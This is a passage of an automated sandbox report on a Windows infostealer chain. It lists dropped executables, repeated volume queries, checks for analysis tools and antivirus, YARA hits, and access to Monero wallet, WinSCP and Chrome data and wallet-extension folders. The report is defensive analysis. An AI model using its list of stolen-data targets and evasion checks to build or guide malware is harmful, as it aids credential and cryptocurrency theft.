                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeQueries volume information: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe VolumeInformation
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeQueries volume information: C:\Windows\System32\WinMetadata\Windows.Globalization.winmd VolumeInformation
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Controls.Ribbon\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Controls.Ribbon.dll VolumeInformation
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.InteropServices.WindowsRuntime\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Runtime.InteropServices.WindowsRuntime.dll VolumeInformation
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeQueries volume information: C:\Windows\System32\WinMetadata\Windows.Data.winmd VolumeInformation
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WPFED71.tmp VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: unknown VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0006CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_0006CBEA
                      Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 11_2_0021DBA0 GetVersionExW,GetVersionExW,GetModuleHandleW,GetProcAddress,11_2_0021DBA0
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
                      Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe
                      Source: 77594b3442.exe, 00000031.00000003.3137575871.0000000000524000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 0.2.file.exe.50000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.skotes.exe.6f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.1764848025.00000000049D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1724316181.0000000004690000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2303212460.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 9d4ddc637a.exe PID: 5600, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 77594b3442.exe PID: 7456, type: MEMORYSTR
                      Source: Yara matchFile source: 00000038.00000003.2987064495.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 513dad5c05.exe PID: 7432, type: MEMORYSTR
                      Source: Yara matchFile source: 43.0.7d28d37061cb43098969a37cf25a380a.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000F.00000002.2742198429.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2742198429.0000000003CBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 4268204ace.exe PID: 7312, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 7d28d37061cb43098969a37cf25a380a.exe PID: 5916, type: MEMORYSTR
                      Source: Yara matchFile source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe, type: DROPPED
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
